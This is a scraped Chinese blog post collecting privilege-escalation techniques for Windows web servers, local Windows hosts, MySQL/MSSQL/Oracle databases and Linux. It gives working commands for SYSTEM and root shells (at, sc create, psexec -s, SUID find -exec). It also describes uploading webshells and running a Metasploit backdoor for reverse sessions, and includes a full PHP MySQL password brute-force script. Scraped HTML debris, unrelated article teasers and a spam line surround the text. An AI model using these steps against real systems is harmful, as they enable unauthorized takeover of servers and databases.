<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰遇見到的好用提權方法集合

    VSole2022-11-30 10:10:43

    權限提升對我們在深度滲透過程中起著重要作用,接下來我將介紹web提權、本地提權、數據庫提權、linux提權。

    權限的劃分

    1、system賬戶

    Windows系統最高級別的權限是System用戶權限,有一些操作需要System權限才能完成,比如修改注冊表核心鍵值、強制結束惡意應用程序進程等。

    2、管理員賬戶

    具有最高的管理和使用權限,能改變系統所有設置,可以安裝和刪除程序,能訪問計算機上所有的文件。除此之外,它還擁有控制其他用戶的權限。

    3、普通用戶賬戶

    某些功能的使用,是受到一定限制的賬戶,在系統中可以創建多個此類賬戶,也可以改變其賬戶類型。該賬戶可以訪問已經安裝在計算機上的程序,可以設置自己賬戶的圖片、密碼等,但無權更改大多數計算機的設置。

    Web提權

    獲取網站權限后,我們僅僅只能對網站操作,無法對服務器進行操作,需要對服務器進行提權,獲取到更高權限。

    案例演示

    1.上傳后門文件,獲取到webshell權限

    2.在web權限提升中,最常用的是溢出漏洞提權,用cmd去執行文件進行提權,從下圖可以清晰的看到我們在webshell看到的權限和服務器上看到的權限是不一樣的。

    3.利用systeminfo進行信息收集,一般關注操作系統版本,打過的補丁編號。

    4.獲取到補丁編號后,我們要進行補丁篩選,推薦兩個優秀項目:wesng , windowsVulnScan。將上面收集到的信息保存到1.txt中,利用wesng進行補丁篩選

    下載地址分別為:

    https://github.com/bitsadmin/wesng

    https://github.com/chroblert/WindowsVulnScan

    5.執行完后會將可能存在的漏洞保存在vuln.csv中

    6.利用MSF或特定EXP進行提權(msf要搭建在外網,才能將會話反彈到本機,內網不能反彈)生成一個5577.exe后門,webshell執行該后門,反彈的端口號為5577

    Msf安裝教程:http://www.ttk7.cn/post-27.html

    7.設置監聽端口為5577

    8.端口反彈的權限為web權限

    9.利用wesng中收集到的漏洞編號,進行模塊利用,并且設置反彈端口,此時的端口號應該與前面的不同,這個端口反彈的權限為提權后的權限,并且監聽的回話為3,與上面的會話對應

    10.成功反彈system權限

    本地提權

    獲取本地普通用戶的權限后,要將權限提升為更高權限,本地提權的成功概率比web提權更高。

    案例演示

    1.系統溢出漏洞提權

    直接網上下載BitsArbitraryFileMoveExploit.exe,運行就可以提升為系統權限

    2.AT命令提權:

    at 13:36 /interactive cmd.exe (在13:36分生成一個交互式的System權限的cmd)

    使用版本:Win2000 & Win2003 & XP

    3.SC命令提權:

    sc Create syscmd binPath= “cmd /K start” type= own type= interact #創建一個名叫syscmd的新的交互式的cmd服務

    sc start syscmd #得到了system權限的cmd環境

    適用版本:windows 7、8、03、08

    4.PS命令提權

    微軟工具包:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

    psexec.exe -accepteula -s -i -d cmd.exe

    適用版本:Win2003 & Win2008

    數據庫提權

    Mysql數據庫提權

    利用UDF提權

    在利用UDF提權時前提是我們需要知道數據庫的密碼,而在正常情況下MySQL數據庫不支持外連,此時如果我們用工具爆破不了,可以上傳腳本進行爆破,腳本如下:

      </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-family: "Microsoft YaHei", 微軟雅黑, "Hiragino Sans GB", STXihei, 華文細黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋體, Heiti, 黑體, sans-serif;">Mysql賬號密碼爆破工具</span><span style="box-sizing: border-box;color: rgb(0, 0, 136);font-family: "Microsoft YaHei", 微軟雅黑, "Hiragino Sans GB", STXihei, 華文細黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋體, Heiti, 黑體, sans-serif;">
      etahttp-equiv="Content-Type"content="text/html; charset=utf-8">
      
       
       
    MysqlDatab aseBlasting(Mysql賬號密碼在線爆破工具 V1.0)
      
    php
    if(@$_POST['submit']){
       $host =@$_POST['host'];
       if($host!=""){
        $username ="root";//用戶名字典
        $password = array('','123456','admin','root123','ccf304vn');//密碼字典
        echo "
    

    --------------------爆破狀態--------------------
    ";
        echo "密碼錯誤次數:";
        for($i=0; $i <= count($password); $i++){
         if(@mysql_connect($host, $username, $password[$i])){
           echo "
    爆破成功--密碼-->".@$password[$i]."";
           break;
         }else{
           echo $i."、";
           continue;
         }
        }
        echo "
    --------------------爆破結束--------------------
    

    ";
       }else{
        echo "a lert('黑客,輸入數據庫IP地址')";
       }
    }
    ?>
      action="MysqlDatab aseBlasting.php"method="post">
       數據庫IP地址:type="text"name="host"/>
       type="submit"value="爆破"name="submit"/>
      
    

    有些提權網上已經寫得很完整,所以接下來有的提權過程就沒有演示,這是我收集的比較好的文章,請大家參考。https://blog.csdn.net/qq_36119192/article/details/84863268

    2.Mssql數據庫提權

    請參考:https://www.cnblogs.com/N0r4h/p/12889944.html

    3.Oracle數據庫提權

    分為以下三種模式:

    普通用戶模式

    前提是擁有一個普通的Oracle連接賬號,不需要DBA,并以Oracle實例運行的權限執行操作系統命令。

    DBA用戶模式

    擁有DBA賬號密碼,可以省去自己手動創建存儲過程的繁瑣步驟,一鍵執行測試。

    注入提升模式

    擁有一個Oracle注入點,可以通過注入點執行系統命令,此種模式沒有實現回顯,需要自己驗證。

    一般Oracle數據庫利用這個工具進行提權(自帶以上三種提權方式)

    下載地址:https://github.com/jas502n/oracleShell

    Linux操作系統提權

    推薦兩個開源的項目

    信息收集腳本

    LinEnum-master:https://github.com/rebootuser/LinEnum

    漏洞探針腳本,獲取可能存在的漏洞

    linux-exploit-suggester:https://github.com/mzet-/linux-exploit-suggester

    在進行linux提權時,推薦使用冰蝎,因為冰蝎里面有很多集成化功能,可以反彈shell到msf中。

    下載地址:https://github.com/rebeyond/Behinder

    案例演示

    1.SUID提權

    漏洞成因:在對文件進行權限設置時,給了文件suid權限,在執行該文件時,會調用特定用戶

    上傳一個腳本到網站,利用冰蝎連接,設置反彈shell

    在msf中執行上面的命令,web權限反彈到msf中

    上傳漏洞探針腳本,并執行,查看是否有suid提權的可能性

    執行一下命令,成功提升為root用戶

    touch shenghuo

    find shenghuo -exec whoami \;

    2.內核漏洞提權

    在內核漏洞提權時,前提要是本地用戶才能進行提權

    請參考:https://www.moonsec.com/archives/379

    3.臟牛提權

    請參考:https://www.cnblogs.com/xiaozi/p/13370721.html

    4.定時任務提權

    請參考:https://www.yidc.net/archives/4380

    5.環境變量提權

    請參考:https://www.freebuf.com/articles/system/173903.html

    httpssystem
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    import javassist.CtClass;import javassist.CtMethod;
    potato提權技術
    2021-12-03 13:39:45
    早在2015年,Google project zero就發布了關于DCOM DCE/RPC本地NTLM Relay的研究,其中提到了使用COM對象及OLE Packager并舉了個例子實現任意文件寫入。
    Bughound是一款開源的靜態代碼分析工具,可以幫助廣大研究人員分析自己的代碼,并將結果發送至Elasticsearch和Kibana,以更好地審查代碼中潛在的安全漏洞。
    美國水務公司WSSC Water正在調查5月份發生的勒索軟件攻擊。
    上百個中國信息系統被檢查出“驗證器”木馬程序.
    App 抓不到 HTTP 包的可能原因
    K8s 的API Server未授權命令執行
    WAF對于一些常規漏洞(如注入漏洞、XSS漏洞、命令執行漏洞、文件包含漏洞)的檢測大多是基于“正則表達式”和“AI+規則”的方法,因此會有一定的概率繞過其防御。繞過waf的測試中,有很多方法可以使用,以下常用方法:
    “智庫推薦”欄目主要聚焦全球頂尖智庫、機構網信領域研究成果及全球主要國家網絡安全戰略政策等,開展網絡空間領域重要研究成果、重要政策法規及標準的跟蹤研究和對比分析。本期推薦3篇近期發布的全球智庫文章。 全球智庫網絡空間安全研究推薦 ——2021年第027期
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类